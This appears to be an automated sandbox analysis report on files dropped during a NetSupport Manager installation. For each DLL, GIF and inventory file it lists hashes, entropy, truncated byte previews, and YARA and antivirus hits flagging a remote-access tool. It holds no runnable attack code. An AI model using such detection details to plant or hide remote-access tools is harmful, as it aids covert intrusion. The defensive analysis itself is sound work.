                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........r.............%......%......%..............(........(......)......).............).....Rich............PE..L.....oe...........!.................A...................................................@..........................-......,%..x....`..`............n...]...p..........8...............................@...............X............................text...[........................... ..`.rdata...m.......n..................@..@.data....-...0......................@....rsrc...`....`.......*..............@..@.reloc..B;...p...<...2..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\HTCTL32.DLL

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):616928
                                                                                      Entropy (8bit):6.723244642108574
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:cVqKnPyKX/gu8Vk3AZkUBEX9gGXiaxHwTcpqPqlu20n9h0hds0/qnrY9vkoBLEla:/cyysqFUY9vkCEswvUKZjI/8ZEjv3Lt
                                                                                      MD5:C666FD00B08757335E2F30CA0D6F63C2
                                                                                      SHA1:996891107C4F32A0062C6FA8C1741A8CD5C659EF
                                                                                      SHA-256:F61ACF95B9B9CBA2AAC856783CF1F2F486548F96CF21118161E40A08C9101E58
                                                                                      SHA-512:33B8D6893C4E370782AA922E1437BF1502D127059F86CA30DAEA3145B99B3459B7D6A1C3471608867CE91D873C1F0B376B550E5AC57BCB36732154C65124E2BA
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\HTCTL32.DLL, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Q...0...0...0...~...0...F...0...0...1...H...0...F!..0...F .B0...F...0...F...0...F...0..Rich.0..........PE..L...y.oe...........!.....l..........]...............................................K)....@..................................z.......0..8................]...@...T.. ...............................`B..@....................s..`....................text....k.......l.................. ..`.rdata...............p..............@..@.data...........*..................@....rsrc...8....0......................@..@.reloc...U...@...V..................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\IcoViewer.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):240096
                                                                                      Entropy (8bit):6.812972915579879
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:AZq8EqxQhS2QfOayU+cO30JHR8jZ4JmBPgyxOJoFiAyFUkplRAYeYjmeejj/:ZaxsmOTWujygwAyFUG1eleg/
                                                                                      MD5:EE02606C9E853533E2FF414E4640571B
                                                                                      SHA1:19C847251AADF8BA5A39CC090EEF8E6D7534C423
                                                                                      SHA-256:8545B1AF2255629A4EEA1B43E3D1794CDB9ED2E51B576F09E1C0C18023B7BCF3
                                                                                      SHA-512:984198538D4FD358E3910F2FA8D0BD6EE6D9488719B456D62D604B6B173F61B6201DFF94DE3722890A99CCADA30F95F009C433010381FB823FB2B16792EF157A
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\IcoViewer.dll, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0.M-t.#~t.#~t.#~...~g.#~...~(.#~}..~v.#~}..~y.#~t."~..#~...~Z.#~...~u.#~...~u.#~...~u.#~Richt.#~................PE..L...b.oe...........!.....R...................p....Xb................................<.....@..........................................P..(............L...]...p...%..`s..................................@............p...............................text....Q.......R.................. ..`.rdata..v....p.......V..............@..@.data....:..........................@....rsrc...(....P......................@..@.reloc...&...p...(...$..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\494126_HF_U1.bin

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):357
                                                                                      Entropy (8bit):5.476560262477391
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:JQDBPwQZBLIMZDoUT1MrRscL26GBMPGBTBLIMZDofTg/bVe6Q5WnfWZBLIMZDoKC:JePw09TDoUZe260M8T9TDofKVe/5Of2m
                                                                                      MD5:20850CE26369AFA16B77D360A50FBFB8
                                                                                      SHA1:A4D2C4A6DF9E252703BC35EBE91F8D82D7D4A7E0
                                                                                      SHA-256:78C5EF98BE61BAE0326E2AAF03494299D49CD9D7BBFAE8058D75A8D1E2882C62
                                                                                      SHA-512:14B59E9AF2DCA6B2D5C5A9AB13B799C7F5E48026BB9B1E6F5B028B66D632B380B34A5D78125BC3E02B6799FBF6275EE695E65F16FB54F042FEFA5FA5126F5841
                                                                                      Malicious:false
                                                                                      Preview:...KB5005260......CHotfixObject...KB5005260(https://support.microsoft.com/kb/5005260.....InventoryTime\UTCTime\0......CHardwareObject.1732326853.KB5013624.....KB5013624(https://support.microsoft.com/kb/5013624.....InventoryTime\Time\0...22 Nov 2024 20:54:13.KB4562830.....KB4562830(https://support.microsoft.com/kb/4562830.....ET\HotFixes...125.ET\Icons...0

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\494126_HW_U1.bin

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):4822
                                                                                      Entropy (8bit):5.703614080281652
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:Bkj45d7NKyBvVVLGngz8BkG3motc6kQJ8xxKkqvLzRYWtEE4Oe+JhoP7QLBRAPOR:q05qE9Vwg22vQmxELz5tf4Obhy0SqHl
                                                                                      MD5:80798C3301A79A06033108F2AE631892
                                                                                      SHA1:DAFC35CFB165ADC2D03DA3DC86520C1C9DE26A04
                                                                                      SHA-256:9193AF4BD1164B3F6F51922C773D28BEC8718A5A2018969E9AF32CC1D4D62277
                                                                                      SHA-512:8F3DD14BB7EA609192E4B46D3BBBC0B64A3E2B8BACB50BA270E96B8266B48DF03CD420C57CB20701EEEB39FDE2902524774CB717B6E2746739752BD8A77F1750
                                                                                      Malicious:false
                                                                                      Preview:...NetworkAdapter\IPSubnet\1......CHardwareObject.255.255.255.0.ComputerSystem\Name\0...494126.OperatingSystem\Version\0...10.0.19042.License\MaxClients\0...9999.DiskDrive\Size\0...488382.ET\Keyboard...125.ET\Enclosure...125.Printer\PortName\4...SHRFAX:.Printer\PortName\3...PORTPROMPT:.Printer\PortName\2...PORTPROMPT:.Printer\PortName\1...nul:.Printer\PortName\0...Microsoft.Office.OneNote_16001.14326.21452.0_x64__8wekyb3d8bbwe_microsoft.onenoteim_S-1-5-21-3425316567-2969588382-3778222414-1001.OperatingSystem\LoggedOnUser\0...user"OperatingSystem\Windows10Version\0...20H2.ET\PhysicalDrive...1125.SoundDevice\Name\1...Realtek High Definition Audio.SoundDevice\Name\0...Intel(R) Display Audio.ET\CPU...1109.NetworkAdapter\DHCPServer\1....NetworkAdapter\DHCPServer\0....LogicalDisk\Description\0....License\SerialNo\0...NSM1234.License\Licensee\0...NSM1234.ET\OS...1172.ET\Memory...125!NetworkAdapter\DefaultIPGateway\0...#DesktopMonitor\CurrentRefreshRate\0...59 LogicalDisk\VolumeSerialNumber\

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\494126_SW_U1.bin

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                      File Type:data
                                                                                      Category:modified
                                                                                      Size (bytes):1579585
                                                                                      Entropy (8bit):2.819314143773699
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:+Ki0l+fHXWm9rgaez0Tv5oLVpX+S6k58nwSs8UaxW9FP8I7uRl96tV:viDTv5EiwSs8nW9F0yuRl9k
                                                                                      MD5:6C11C313587D3E0FDC4C83E7A57C617A
                                                                                      SHA1:BF8916537BD3E0FBBEFDFBB905072E7CD30025FC
                                                                                      SHA-256:B97C2C11A1859DB1661403EDC70F75D1C34244D48BE12F421B9CB1AA54508B19
                                                                                      SHA-512:32612E1B3B305BCD35A258D09DBB2F1EA8196343588E285BB817798C23AEAC04ED4BA81A7ED55424CD84184AC8FDACE93A09325BB8C8BAB4ECF56CCFB433BDD7
                                                                                      Malicious:false
                                                                                      Preview:u..OneNote for Windows 10/0/0......CSoftwareObject.16001.14326.21452.0.OneNote for Windows 10.Microsoft Corporation.OneNote for Windows 10jC:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.14326.21452.0_x64__8wekyb3d8bbwe\onenoteim.exe..PKAAAACwAAABYAAAAAQAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\amberbar.gif

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:GIF image data, version 89a, 1 x 20
                                                                                      Category:dropped
                                                                                      Size (bytes):831
                                                                                      Entropy (8bit):0.983335608654777
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:CBI/xi8M9C1Awcr02mxhl/E0ltrllwklE:wMc9CKwa0Rl/1lqklE
                                                                                      MD5:A2D88CFF615C867DD12ED7F2A0F4B307
                                                                                      SHA1:0BF04BDF015CF392AC7322200287482CA5BB4DE1
                                                                                      SHA-256:470801C93670F95D15D29D962E7903650F42B55EFF38DEBEDF76AF66E55D18F3
                                                                                      SHA-512:653B07F4D80D90E9730F6B1E405BEE77843A9FE2F9812B98642599CD441ACA3296FD2B6C8A25EBD68D4F981694E4AFDA6A4E7596091ED92496BFBA451E2CFA7A
                                                                                      Malicious:false
                                                                                      Preview:GIF89a........{.........!..!.!.!.!........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!..NETSCAPE2.0.....!.......,...............H.`...;

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\bar.gif

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:GIF image data, version 89a, 10 x 20
                                                                                      Category:dropped
                                                                                      Size (bytes):847
                                                                                      Entropy (8bit):1.3936912447177485
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:CiIF3VdYF2tvfnug2A+HJaR85r02mxhl/E0ltrllIWzv12b/bVfe:zw4yGg2p0Rl/1lmy19
                                                                                      MD5:55E6FD2D853C73F3521420BF2A969DA7
                                                                                      SHA1:A45054111BF65155C586843B4CD40EA74E54C105
                                                                                      SHA-256:9513298F36610F67CF7D68559A2511B4CA35F93B84A648809C3EE381E2A3FCEA
                                                                                      SHA-512:C8B8BE6579566ADEB4096FC82057064E17DD3815059148D617C5B83A80B174A7C7849DF4ECCAA0C345B3193B9EDF5AFE7D9E748E8864C5FE142FEBA989BD4566
                                                                                      Malicious:false
                                                                                      Preview:GIF89a.......hhhpppxxx.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!..NETSCAPE2.0.....!.......,...............H......*\....#J..0 .;

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\baseboard.gif

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:GIF image data, version 89a, 256 x 256
                                                                                      Category:dropped
                                                                                      Size (bytes):3600
                                                                                      Entropy (8bit):7.868516763778815
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:h+b+Hb7fTL37CCWf71dHoBbNVBqEjXOTbrPw6ASzi8y04dBrNNHbahN:h3f33uVf/HoBpVoErOvU6ry0ATN7AN
                                                                                      MD5:93997B1706AD63178B10429687E9B567
                                                                                      SHA1:A2D56AA4BDF21995E5B298E3B12DD76681617292
                                                                                      SHA-256:55C31D2A6EB40EB606AB3C0E65F98CC010AE9B8803E4553D8DB273944C8C0423
                                                                                      SHA-512:BCC3BD3D94FB50034EEC3D74C1F3AF1524CA485C4373DF7945A1CF259D03854F4EBE953D7BB70F4FB77A0924183853E4EEF807DC265172B06A32A680AF63A302
                                                                                      Malicious:false
                                                                                      Preview:GIF89a..........888...t(...==<<<;;;:eedddcccbbba``___^]]\\\[......................................................edcdcba`_kjiihghgfgfe...........................<;;kjjjiidcccbbbaaa``_^^^]]]\\[ZZ................................................................................................................eee[[[JJJIIIGGGFFFEEEDDDCCC===<<<;;;:::999.............................................!.....q.,............q............................................................................................................pbB.........[H........n..~..*\...5Z.$tH..E|a$*...Grp........G";..B8k.h46...8s.....@...J....(...f&..F.J.J..U..f........K.lY..J(}....f...K.'........m.......C..._...:....89..*..."..B.....4..S..30.S.......S..B.........E6/....).D.qn....y....0P0.[\.*..7...6..6.........U_.Q=....m.OO.s..k........>...'....T.'...6(....@..P..._..C...v.!..~(.!..a.&v..X..`.7opa..v.b.$....7..c.+..AR....4.....&29.."By..ca.../zs..H.2_cR......d.He.*0...N.(...Y&.d.c8i....fe.@.

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\broken.gif

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:GIF image data, version 89a, 16 x 16
                                                                                      Category:dropped
                                                                                      Size (bytes):938
                                                                                      Entropy (8bit):2.8573986253171575
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:NzpsyX87KPbQBfO2/6jpywkVtiAoKgHQHt1Z39rvpmE:bev16VcH9gwNbhpmE
                                                                                      MD5:B373B4BDEE4E220D7515FBB293FB7224
                                                                                      SHA1:0C316664C0151093ED2A76C4C6285BA0835DDE74
                                                                                      SHA-256:59F6F5B3C98AFE90D4916C626D6459984AF3649B9F63F7BCE0925EAA49FBB1C2
                                                                                      SHA-512:CAAB966B209B9CD0D8818F9F91A99D3D2574EBD8F795B6E06EDA08AF3F2662DAB0DC319DC62656FE098557244037D148BE6C56FF1A88D08358BE90DC19744C15
                                                                                      Malicious:false
                                                                                      Preview:GIF89a........L3.M4.P7.R:.U=.X@.ZC._I.`J.iU.o[.q^.vc.xe.|j.q.u.z.|......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!.......,...............X!....0.\.......*\. .E...b.xQ.@..H.xX.....m|H.e..-!jP.q@.$.@d` ..:!".........y.a.........D.9..t.`.@..#V..!.C..5..8`,.....@.`...;

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\btn_down.gif

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:GIF image data, version 89a, 14 x 13
                                                                                      Category:dropped
                                                                                      Size (bytes):891
                                                                                      Entropy (8bit):1.8494573303221005
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:mu8sPdPXrJ+l3Ozvn/lvW88B1lWqv/L9lUo/E:71/r4qFvWzd9E
                                                                                      MD5:220F33361D1D587C5899444C7B6C57CF
                                                                                      SHA1:53E9498570FA8DFFE491F4854104254EE395F9E7
                                                                                      SHA-256:163082A6F3992DC25B4B8848D2DB66A9E27CE7E6535B5F277DF119506CD1E4EA
                                                                                      SHA-512:FA336DB5835DA1FB5D943CBC40EEB8890B07BB14E5A2BB330F606500168C53661AC942C9148C1AB7EA6E656804D5E9F9C6832A4117DD1BFC165EEF502554D092
                                                                                      Malicious:false
                                                                                      Preview:GIF89a....................5.@S@QbQQcQYjYcsc{.{K.KL.L.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!.......,..........X.'..H. .............6@ .....F..a.....$P@P.......P.A..........U.Xp.....}...@@.....@.4 .;

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\btn_down_grey.gif

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:GIF image data, version 89a, 14 x 13
                                                                                      Category:dropped
                                                                                      Size (bytes):827
                                                                                      Entropy (8bit):1.2654828024465707
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:CABkulKFUFPtb9h4H9ee0XLylEJ+llt9YRka2b/rG:mu8sPdPXrJ+l3iRkaJ
                                                                                      MD5:6D7B88F8F540000104F86637B7A31E5B
                                                                                      SHA1:BB4D3765DA73CAF1B7CC2843EAE1106B3E67963F
                                                                                      SHA-256:104D7AD8EAFF36E019A84C3B18D1B37591D06D9C9841FF5B82310A800556EEC9
                                                                                      SHA-512:FBFA45CD58F55C0E745539014FCE0DDCDD913DA38F1AE5BAD7C2147FEF64E1DD585BB6411EC981D08AAA147B64BB6A93D2287A20719946CEBF4CDBB36695B269
                                                                                      Malicious:false
                                                                                      Preview:GIF89a....................5.@S@QbQQcQYjYcsc{.{K.KL.L.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!.......,............'..H......*\....#J\...;

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\btn_up.gif

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:GIF image data, version 89a, 14 x 13
                                                                                      Category:dropped
                                                                                      Size (bytes):891
                                                                                      Entropy (8bit):1.8451090876153475
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:CABkulKFUFPtb9h4H9ee0XLylEJ+llt9AzVFkmipnBIsRvssqy89sR1lfcTFEn:mu8sPdPXrJ+l3Ozvk2Ass0eR12K
                                                                                      MD5:78D2B10A120613047C691C679F165799
                                                                                      SHA1:6D3998780D06860C1589DFB2C0E826EFD86E05F3
                                                                                      SHA-256:CDA873D713E82B0E32020B393B3166A7E2E05DCEB7F8D269B4C64771888446BF
                                                                                      SHA-512:47EA9D750F7A5B1E22D92A35D870256BFC8045FCFC7D2B87E0E089820A6BBD71FF81F15F4877DDF3DD32C047747DD34DA47698441CAC82E62873876001378B9E
                                                                                      Malicious:false
                                                                                      Preview:GIF89a....................5.@S@QbQQcQYjYcsc{.{K.KL.L.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!.......,..........X.'..H.`A......@@....(P......, ..b....8(.pd...J.x..F..)..)q ...f2.0..@..t.l.@ ..H...h0 .;

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\btn_up_grey.gif

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:GIF image data, version 89a, 14 x 13
                                                                                      Category:dropped
                                                                                      Size (bytes):827
                                                                                      Entropy (8bit):1.2654828024465707
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:CABkulKFUFPtb9h4H9ee0XLylEJ+llt9YRka2b/rG:mu8sPdPXrJ+l3iRkaJ
                                                                                      MD5:6D7B88F8F540000104F86637B7A31E5B
                                                                                      SHA1:BB4D3765DA73CAF1B7CC2843EAE1106B3E67963F
                                                                                      SHA-256:104D7AD8EAFF36E019A84C3B18D1B37591D06D9C9841FF5B82310A800556EEC9
                                                                                      SHA-512:FBFA45CD58F55C0E745539014FCE0DDCDD913DA38F1AE5BAD7C2147FEF64E1DD585BB6411EC981D08AAA147B64BB6A93D2287A20719946CEBF4CDBB36695B269
                                                                                      Malicious:false
                                                                                      Preview:GIF89a....................5.@S@QbQQcQYjYcsc{.{K.KL.L.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!.......,............'..H......*\....#J\...;

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\computer2.gif

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:GIF image data, version 89a, 256 x 256
                                                                                      Category:dropped
                                                                                      Size (bytes):2574
                                                                                      Entropy (8bit):7.7150160845623175
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bq5K+FBR57fTL377fTClBHG+6OnPMddPp6pZRIqSCrOV8snZAOgadLO+:bqLFFf33PfuPi8uvCrOGsGN4Ld
                                                                                      MD5:AA5557A8EA8F8AF1B223501E4CB02E4D
                                                                                      SHA1:39E7292B18779468700245B526364B06C8AF09C9
                                                                                      SHA-256:E1427F55EDB661FF70EB297F887410F73109BB6CF25592E0AC548C5F4D1B7AD8
                                                                                      SHA-512:24CF5B8525065AF3F07F8A82ED189383E7AFD7D9F2F8E74C3B45CC4ED504ECD751FFE5DE15C28A2715172DAC38AF4D5B1E3E41E55CFE20019C830AB2CB3A69DA
                                                                                      Malicious:false
                                                                                      Preview:GIF89a..........888".................$..%..&..'..*..,..>..?..@..A..B..C..C..D..E..F..G..H..U..U..V..g..x.........................................?..U..f..f..y..{...........................................................mmmkkkiiigggeeeaaa```.............................................................................................................................................!.....Q.,............Q.................................................................................................................................H...z.O.\.a....J.HQ..R.3j$x... .u...d..L..2.>.0c.I...8s..)..;...JTgO....]...H7)uJ..P.Q3M..+M.Y/m.J.+...]..,.Ij...z..{s......|..+.o^...+.l.pa{..+..1B.i.G&J.....0g............k.].......L....3s'Nm..o....6~.w...r..mt.W/{.{...v..>.Y....7_u....g..>.....g._..........# ".&...).`c.N....E....ZH.|.15.q.vX...("].j..r'.E"m&.....(cN4.f.7..<..@.%.`..... E.u._I.."i->.W.K6I....y..P@..M0...I q..E.....y.......^X...w..&|...

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\cpu2.gif

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:GIF image data, version 89a, 128 x 128
                                                                                      Category:dropped
                                                                                      Size (bytes):6416
                                                                                      Entropy (8bit):7.672789387563995
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:dof5Gc5nRjOhtX21I1cv8jecTgaTobE0Gqe+3DWcgEB5qD5nXLuIi4UvUCF8UyIt:c5/RKX2vvQW9G4DFgEjWUBZLMA
                                                                                      MD5:9C66D6A559E99539BE51D8B506937B03
                                                                                      SHA1:8B6CFBFD26E68832DBF190BCBA6ABAD7696D5B54
                                                                                      SHA-256:EC9C5DD2A41455755758BE16EE3B0FBC1173EE953F1B49D820FD68AC5B7FA9CC
                                                                                      SHA-512:769D72D56A0F2B580391440CF1E1808523D2286E9659005A7D4120C655EB504BD773F6DC223A3A9782D1B82779BA901AFEADF59701D5C8EAC61EFB89B51F07C7
                                                                                      Malicious:false
                                                                                      Preview:GIF89a...................uy............UUU999.................}}}...>>>......555.........111............%%%...NNN.........))).....kkk...{..fffPPPhhh...---...lllbbb...^^^pppRRR!!!...XXXZZZFFFnnn......LLLxxx...\\\ttu.........vvvhmt```BBBHHH...DDD...kr|zzz...V]c........@@@.................dddJJJ....svz......rrr...dfi.......PSV......UVY.....ijm.........^dl.............y{~...Y[]......=AE.........,,+...777.........RST.........OOO...0..234........................WWWbcfklnqsuEEE444MMMttwaaaKIIvwz......hhg.........333LMN]]]nnm___JJL...YYY......BCDqtxTTUBAAEDCcccFFE...iiimnpffdqqqIKK......AFK8;>;;;.........HHG...346.......................cin...+--???mmmoooiijijkjjiQRSQQQ...]]_]^`[\_qqpQX^\\[[[[KMOKKKbaaLLKddgcddeee^^]......bbasssrrqA@?opsGGGTTTSSSyy{CCCAAAgggHIK...!.......,...............H......*\....#J.H....3j.... C..I...(S.\...0c.I...8s.....@...J...H.*]...P.J.J...X.j....`+0....N.........2.8.Q@...".e..._#...K.a..\...adH.....h....y<.A.`.O.Y..:.....F.4.P....b.

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\disk2.gif

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:GIF image data, version 89a, 256 x 256
                                                                                      Category:dropped
                                                                                      Size (bytes):6520
                                                                                      Entropy (8bit):7.841992508206522
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:LjnnfoGCriNQaG34T46tblxNC53jX3gp6JE:/nfok3Uo46tp653b3G6JE
                                                                                      MD5:F9F426CA807A7EEE268EEDAD685998A7
                                                                                      SHA1:777892BBA52A7914F5AC030A215FE536F1D850FF
                                                                                      SHA-256:DCEAC6EB086C02875C1F2A6221750A6B9E7C10E42D498106F4AE72AABE639321
                                                                                      SHA-512:C129EAB92CEDEF05FA1A772F0C8C93E5EDB01BCEF77A844F22EE648FDC79EE631A0687DC837FD07A8B75364339C0F38DE1DCA3DFBD1FD4E7E8382C5E473B6B0C
                                                                                      Malicious:false
                                                                                      Preview:GIF89a................t(888TTSPPOOONNNMJJIDDCBBA@@?llkiihhhg\\[[[ZZZYVVU....................}........................................................................fededc`_^YXWVUT.~}}|{{zyzyxyxwpononmlkjkji...............................................~..............................................................................?>>=<<TSSPOOLKKHGGDCCCBBjiidcc_^^YXXXWW..........................................................................................................................................................................................|||zzzyyyvvvtttssspppnnnmmmjjjfffeeebbb```]]]\\\YYYVVVUUUTTTSSSPPPMMMLLLKKKHHHGGGFFFDDD@@@;;;999..............................................................................................................................!.......,...............H......*\....#J.H....3j.... C..I...(S.\...0c.I...8s.....@..t$...H.*].4.P.J.J...X.j..j.`..;2.O.y.......p..K...J..1..ZG...K....^..e..PP>..+......['/>e..h..b.Mzt..&.=r.r..

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\greenbar.gif

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:GIF image data, version 89a, 1 x 20
                                                                                      Category:dropped
                                                                                      Size (bytes):831
                                                                                      Entropy (8bit):0.972559746338926
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:CBI/VXVm/XFkMr02mxhl/E0ltrllQ6E:woXVm/B0Rl/1l1E
                                                                                      MD5:BA6A6D3669870D2DB7EDC67BBF3FF236
                                                                                      SHA1:3B3D0AB6731C4A146DD10BED4D06FC260657F059
                                                                                      SHA-256:A59009593867C1E9F6866A0BBD1E81B9D525A1844D0E2E8FC89DC92411DB00FA
                                                                                      SHA-512:A76BC5E20A7C71C64F398503BC34BE777115593DA56089D29F09FB1F5BA8A7FB22B5E190BBD56237DABC1F02838F3A5E7D322162C3A4800D255B541FE4CF5867
                                                                                      Malicious:false
                                                                                      Preview:GIF89a.......p.pp.pp.pp.pp.pp.pp.pp.pp.p.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!..NETSCAPE2.0.....!.......,...............H.`...;

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\header.gif

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:GIF image data, version 89a, 108 x 85
                                                                                      Category:dropped
                                                                                      Size (bytes):7876
                                                                                      Entropy (8bit):7.513291372804623
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:lY8I2A27bUw0r7Ro7cFjYLNT0vvqFZsI+8YrYn1XsjJmIXb:y8SobXORac+T0GZst8YrYn18ZL
                                                                                      MD5:1778BE96CF115F3207F976CC1064612B
                                                                                      SHA1:CFAC3B903F0E11E3263582EB3B1BFB4E6432CDE7
                                                                                      SHA-256:204A91AF35DD6F6CBAA6FC84D4AF48F78D3A56945526DEC0A27B4BCA6C1C4738
                                                                                      SHA-512:659AD463254D3522941744500670C527280A5173B25487BED82413885A9C67B2EB79C95897D256DA73D2C9D93D8FE7AD53DBF412D1E7BFAC7C223DEB37291A8D
                                                                                      Malicious:false
